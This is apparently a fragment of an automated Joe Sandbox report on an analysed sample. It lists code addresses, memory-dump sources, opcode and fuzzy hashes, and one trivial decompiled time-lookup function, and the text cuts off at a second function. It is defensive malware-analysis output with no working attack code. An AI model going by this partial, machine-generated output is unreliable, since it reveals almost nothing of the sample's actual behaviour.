                                                                                                                    0x00b7ecd7
                                                                                                                    0x00b7ecdc
                                                                                                                    0x00b7ecdf
                                                                                                                    0x00b7ece8
                                                                                                                    0x00b7ecf5
                                                                                                                    0x00b7ecfa
                                                                                                                    0x00b7ed0e
                                                                                                                    0x00b7ed10
                                                                                                                    0x00b7ed14
                                                                                                                    0x00b7ed18
                                                                                                                    0x00b7ed20
                                                                                                                    0x00b7ed23
                                                                                                                    0x00b7ed34
                                                                                                                    0x00b7ed39
                                                                                                                    0x00b7ed41
                                                                                                                    0x00b7ed4b
                                                                                                                    0x00b7ed4f
                                                                                                                    0x00b7ed57
                                                                                                                    0x00b7ed5b
                                                                                                                    0x00b7ed67
                                                                                                                    0x00b7ed6a
                                                                                                                    0x00b7ed70
                                                                                                                    0x00b7ed77
                                                                                                                    0x00b7ed92
                                                                                                                    0x00b7ed9a
                                                                                                                    0x00b7ed9d
                                                                                                                    0x00b7eda7
                                                                                                                    0x00b7edaa
                                                                                                                    0x00b7edb0
                                                                                                                    0x00b7edc2
                                                                                                                    0x00b7edc5
                                                                                                                    0x00b7ede1
                                                                                                                    0x00b7ede3
                                                                                                                    0x00b7ede7
                                                                                                                    0x00b7edeb
                                                                                                                    0x00b7edf1
                                                                                                                    0x00b7edf6
                                                                                                                    0x00b7edfd
                                                                                                                    0x00b7ee02
                                                                                                                    0x00b7ee0c
                                                                                                                    0x00b7ee16
                                                                                                                    0x00b7ee1a
                                                                                                                    0x00b7ee22
                                                                                                                    0x00b7ee2c
                                                                                                                    0x00b7ee30
                                                                                                                    0x00b7ee36
                                                                                                                    0x00b7ee3b
                                                                                                                    0x00b7ee42
                                                                                                                    0x00b7ee57
                                                                                                                    0x00b7ee5d
                                                                                                                    0x00b7ee61
                                                                                                                    0x00b7ee64
                                                                                                                    0x00b7ee66
                                                                                                                    0x00b7ee6a
                                                                                                                    0x00b7ee6e
                                                                                                                    0x00b7ee77
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7ee7d
                                                                                                                    0x00b7ee85
                                                                                                                    0x00b7ee87
                                                                                                                    0x00b7ee8b
                                                                                                                    0x00b7ee90
                                                                                                                    0x00b7ee92
                                                                                                                    0x00b7ee96
                                                                                                                    0x00b7ee9d
                                                                                                                    0x00b7eea3
                                                                                                                    0x00b7eea7
                                                                                                                    0x00b7eeab
                                                                                                                    0x00b7eeaf
                                                                                                                    0x00b7eeb6
                                                                                                                    0x00b7eeb8
                                                                                                                    0x00b7eebc
                                                                                                                    0x00b7eec0
                                                                                                                    0x00b7eec7
                                                                                                                    0x00b7eecb
                                                                                                                    0x00b7eed3
                                                                                                                    0x00b7eed7
                                                                                                                    0x00b7eedb
                                                                                                                    0x00b7eedf
                                                                                                                    0x00b7eee6
                                                                                                                    0x00b7eeea
                                                                                                                    0x00b7eeea
                                                                                                                    0x00b7eef1
                                                                                                                    0x00b7eef5
                                                                                                                    0x00b7eef7
                                                                                                                    0x00b7eefb
                                                                                                                    0x00b7eefe
                                                                                                                    0x00b7ef02
                                                                                                                    0x00b7ef06
                                                                                                                    0x00b7ef09
                                                                                                                    0x00b7ef0d
                                                                                                                    0x00b7ef11
                                                                                                                    0x00b7ef14
                                                                                                                    0x00b7e9e0
                                                                                                                    0x00b7e9e8
                                                                                                                    0x00b7e9ec
                                                                                                                    0x00b7e9ef
                                                                                                                    0x00b7e9f1
                                                                                                                    0x00b7e9f5
                                                                                                                    0x00b7e9fb
                                                                                                                    0x00b7ea00
                                                                                                                    0x00b7ea07
                                                                                                                    0x00b7ea12
                                                                                                                    0x00b7ea1c
                                                                                                                    0x00b7ea28
                                                                                                                    0x00b7ea2c
                                                                                                                    0x00b7ea34
                                                                                                                    0x00b7ea3e
                                                                                                                    0x00b7ea44
                                                                                                                    0x00b7ea47
                                                                                                                    0x00b7ea4e
                                                                                                                    0x00b7ea5d
                                                                                                                    0x00b7ea79
                                                                                                                    0x00b7ea81
                                                                                                                    0x00b7ea85
                                                                                                                    0x00b7ea8d
                                                                                                                    0x00b7ea91
                                                                                                                    0x00b7ea95
                                                                                                                    0x00b7ea9b
                                                                                                                    0x00b7eaa0
                                                                                                                    0x00b7eaa7
                                                                                                                    0x00b7eaac
                                                                                                                    0x00b7eab6
                                                                                                                    0x00b7eabc
                                                                                                                    0x00b7eac0
                                                                                                                    0x00b7eac4
                                                                                                                    0x00b7eacc
                                                                                                                    0x00b7ead4
                                                                                                                    0x00b7eadb
                                                                                                                    0x00b7eadf
                                                                                                                    0x00b7eae5
                                                                                                                    0x00b7eaea
                                                                                                                    0x00b7eaf1
                                                                                                                    0x00b7eb08
                                                                                                                    0x00b7eb17
                                                                                                                    0x00b7eb1f
                                                                                                                    0x00b7eb21
                                                                                                                    0x00b7eb25
                                                                                                                    0x00b7eb2c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7e9e4
                                                                                                                    0x00b7e9e4
                                                                                                                    0x00b7eb32
                                                                                                                    0x00000000
                                                                                                                    0x00b7eb32
                                                                                                                    0x00b7ef24
                                                                                                                    0x00b7ef24
                                                                                                                    0x00b7eb44

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: 906d72fbb153d4a3dfdb36b7ef2e9b8637b85625c7fce39734c7e25e7170b648
                                                                                                                    • Instruction ID: 8092dbdaa8e81a387ed9a8e4ac5eda5a4178281af0bbfa67ea016605704bbfd6
                                                                                                                    • Opcode Fuzzy Hash: 906d72fbb153d4a3dfdb36b7ef2e9b8637b85625c7fce39734c7e25e7170b648
                                                                                                                    • Instruction Fuzzy Hash: 70D12C729083148FC758DF4AD84005BF7E2BFC8314F1A896EF899A7315DB70A9568BC6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1A540 Relevance: 1.5, APIs: 1, Instructions: 3timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B1A540(void* __eax, struct _FILETIME* __ecx) {
				void* _t1;

				_t1 = __eax;
				GetSystemTimeAsFileTime(__ecx);
				return _t1;
			}




                                                                                                                    0x00b1a540
                                                                                                                    0x00b1a541
                                                                                                                    0x00b1a547

                                                                                                                    APIs
                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00B4A7F2,00000000,00000000,766E89A0), ref: 00B1A541
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2086374402-0
                                                                                                                    • Opcode ID: f6b69327434c339066f5fc472fcf783d438e5f5e64b17b332e7103a7d4d9adfc
                                                                                                                    • Instruction ID: aa9c335fa2a2e6f9b24eb8caad8c0b14003d3e9f92cc052048ed0c439386e0c0
                                                                                                                    • Opcode Fuzzy Hash: f6b69327434c339066f5fc472fcf783d438e5f5e64b17b332e7103a7d4d9adfc
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B70D89 Relevance: .5, Instructions: 519COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                                    • Instruction ID: e22ebfe524936aa9864c6235023be870a0c2f310a85377f26808bd312c5663a2
                                                                                                                    • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                                    • Instruction Fuzzy Hash: 3C020C73A1835187D714CE1DCCC0229B7E3FBD0390F6A896EF8AA47385DAB09946C795
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B66A00 Relevance: .2, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ab8e8ded1ea6b08ef08f694be1910e3b6fe88fe2cf18f722c691b0369cd1b31
                                                                                                                    • Instruction ID: 86b05d1b0cc1e1abcfdb31d6fe467720e9bd4115d4f9fa9bc508ffd6813de826
                                                                                                                    • Opcode Fuzzy Hash: 5ab8e8ded1ea6b08ef08f694be1910e3b6fe88fe2cf18f722c691b0369cd1b31
                                                                                                                    • Instruction Fuzzy Hash: F8611CB3208211CFD718CFA9E580E66B3E9EB98320B1685BEE145CB3A1E771DC45C758
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B74B00 Relevance: .2, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                                                                                                    • Instruction ID: 18b410f81f086040235c33d27cd8414c44e69d1d3ee6d57e4e39a6e586bb2b4c
                                                                                                                    • Opcode Fuzzy Hash: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                                                                                                    • Instruction Fuzzy Hash: 4781F2B2D447298BD710CF88ECC4596B3A1FB88308F0A467DDE591B352D2B9B915DBD0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B741C8 Relevance: .2, Instructions: 216COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9fcc8ad9e77f808096bbb0ef2b6a87663bf9bf3df8f2db8f5ea77e658cd8aa71
                                                                                                                    • Instruction ID: 107537217017637205ebb057a3ba5c252567d645b54893b53c11151f59cad319
                                                                                                                    • Opcode Fuzzy Hash: 9fcc8ad9e77f808096bbb0ef2b6a87663bf9bf3df8f2db8f5ea77e658cd8aa71
                                                                                                                    • Instruction Fuzzy Hash: 6CA1DB7190824A8FD729CF18D490AAEB7F2FF84308F15896DE89A8B341D735EA55CF41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B74E20 Relevance: .2, Instructions: 216COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                                                                                    • Instruction ID: a6d66c42c392a7c5aada06e33134a847f2ec0008a9ddb2cfc5d3f64587c120bb
                                                                                                                    • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                                                                                    • Instruction Fuzzy Hash: 13919F7281871A8BD314CF18D88025AB7E0FB88318F45067DED9A97341D779EA55CBC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B28519 Relevance: .2, Instructions: 167COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                                                                                    • Instruction ID: 41097ebbb00d7189b6b6a9463205f9efc91ae2aa5cbaa9f2e1ef411d794b43a9
                                                                                                                    • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                                                                                    • Instruction Fuzzy Hash: D2519072F016199BDF08CE98E9816ADB7F2EB98304F2481A9D115E7381DB749B41CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6A9C0 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a22af46865504d2accaa238ab45716b6a2c810ed5c14c5170e49fb462db8a67
                                                                                                                    • Instruction ID: 17aa3d6acbac50c48521268ad622130b0cf4a32fb57616a7c50bd5abf7676b30
                                                                                                                    • Opcode Fuzzy Hash: 1a22af46865504d2accaa238ab45716b6a2c810ed5c14c5170e49fb462db8a67
                                                                                                                    • Instruction Fuzzy Hash: 5B41B332F106200AB3488F369C851667BD3DBC9392B55C67DD5A9CB6D9DD7DC407C290
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2A87C Relevance: .1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                                                                                    • Instruction ID: 4051ae6cbc1e0e2bd0db4fa34291eecc8586c67e7f4d2a5bfa5d298319ed9702
                                                                                                                    • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                                                                                    • Instruction Fuzzy Hash: 5A3114677A4411178B1CCD2BDC427AF92939BE422670EDF795948CEF55D92CC8124146
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6C350 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                                                                                    • Instruction ID: e8bcb66e79fc289ccbc850ef483d6d5a57929ce1d5b4b4f322c8db2b33853a4b
                                                                                                                    • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                                                                                    • Instruction Fuzzy Hash: 33314873500A050AF620C92A8D983767A93DFD1364F1AC7F9DAD6877ECDE389C068144
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6C4B0 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                                                                                                    • Instruction ID: dcb74e7f7ec4dc61c94f76b3d1b1d155c2ddc786a21b3b52797336706b0ac7a0
                                                                                                                    • Opcode Fuzzy Hash: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                                                                                                    • Instruction Fuzzy Hash: 9F3107B3900A054BF6108519CD863766AD3DBE2370F2A87A9CDD7976E8CA79BC428245
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B8253A Relevance: .1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                                                                                    • Instruction ID: 0373817f84f7bca59ac499959723eb9ce19f208afbd49b299b4f204c106f776c
                                                                                                                    • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                                                                                    • Instruction Fuzzy Hash: 432137729104258BC705EF2DF8986B7B3E1FFE4319F678A6AD9828B190C634D845D7A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B82621 Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
                                                                                                                    • Instruction ID: 20be1387c8c7e0b4958dc415f6cb51177ef76c9a3f3728515856a081d29ffedf
                                                                                                                    • Opcode Fuzzy Hash: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
                                                                                                                    • Instruction Fuzzy Hash: 8021E2326011148BC741EF6AD98869B73E6EFC8365F6BC67DDD8147245C631EA06C790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B781E0 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
                                                                                                                    • Instruction ID: 04e2b01e2378e27029cd24a02c6a5cfb66ade1dfedc57040df04b8e82787e5a5
                                                                                                                    • Opcode Fuzzy Hash: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
                                                                                                                    • Instruction Fuzzy Hash: 3101DE6529668989E781DA7DD890748FEC0F756303F9CC3E4E088DBF42D989C54BC3A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4A4DF Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B4A4DF(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t50;
				void* _t51;
				void* _t54;
				void* _t55;
				signed char* _t83;
